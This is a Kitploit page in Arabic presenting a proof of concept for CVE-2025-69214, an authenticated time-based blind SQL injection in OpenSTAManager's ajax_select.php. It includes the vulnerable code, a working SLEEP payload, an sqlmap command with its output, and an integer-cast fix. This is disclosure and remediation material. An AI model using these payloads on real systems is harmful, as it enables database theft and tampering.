Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-69214 — إثبات مفهوم لـ CVE-2025-69214: حقن SQL في نقطة نهاية ajax_select.php componenti في OpenSTAManager. يتضمن تحليل الكود الضعيف واستغلال أعمى قائم على الوقت مع SQLMap وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/lukasz-rybak/cve-2025-69214
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البيانات
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

إثبات مفهوم لـ CVE-2025-69214: حقن SQL في نقطة نهاية ajax_select.php componenti في OpenSTAManager. يتضمن تحليل الكود الضعيف واستغلال أعمى قائم على الوقت مع SQLMap وإرشادات المعالجة.

عرض المستودع
3منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69214: OpenSTAManager يحتوي على ثغرة حقن SQL في ajax_select.php (نقطة نهاية componenti)

نظرة عامة

الحقلالتفاصيل
معرف CVECVE-2025-69214
الخطورةعالية
الإشعار الأمنيعرض الإشعار الأمني
اكتشفهLukasz Rybak

المنتجات المتأثرة

  • devcode-it/openstamanager (الإصدارات: <= 2.9.8)

تصنيف CWE

  • CWE-89: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL ('حقن SQL')

التفاصيل

الملخص

توجد ثغرة حقن SQL في نقطة نهاية ajax_select.php عند معالجة عملية componenti. يمكن لمهاجم مُصادَق حقن كود SQL خبيث عبر معامل options[matricola].

إثبات المفهوم

الكود القابل للاستغلال

الملف: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

تدفق البيانات

  1. المصدر: $_GET['options']['matricola'] → $superselect['matricola']
  2. موضع الضعف: يتم دمج إدخال المستخدم مباشرةً في جملة IN() دون تعقيم
  3. المصب (Sink): يتم تنفيذ الاستعلام عبر إطار عمل AJAX

الاستغلال

إثبات يدوي (حقن SQL أعمى زمني):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
صورة

الاستغلال باستخدام SQLMap:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

مخرجات SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
صورة

التأثير

  • سرقة البيانات: يتيح حقن SQL الأعمى الزمني استخراج قاعدة البيانات بالكامل
  • تجاوز المصادقة: الوصول إلى بيانات حساسة للمكونات والمعدات
  • التلاعب بالبيانات: إمكانية تعديل غير مصرح به للسجلات

الإصلاح

حول القيم إلى أعداد صحيحة قبل استخدامها في SQL:

قبل:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

بعد:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

الإشادة

اكتشفه: Łukasz Rybak

المراجع

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

إخلاء المسؤولية

تم الإفصاح عن هذا CVE بشكل مسؤول وفقًا لممارسات الإفصاح المنسق عن الثغرات الأمنية. المعلومات الواردة هنا لأغراض تعليمية ودفاعية فقط.

تنزيل الأداة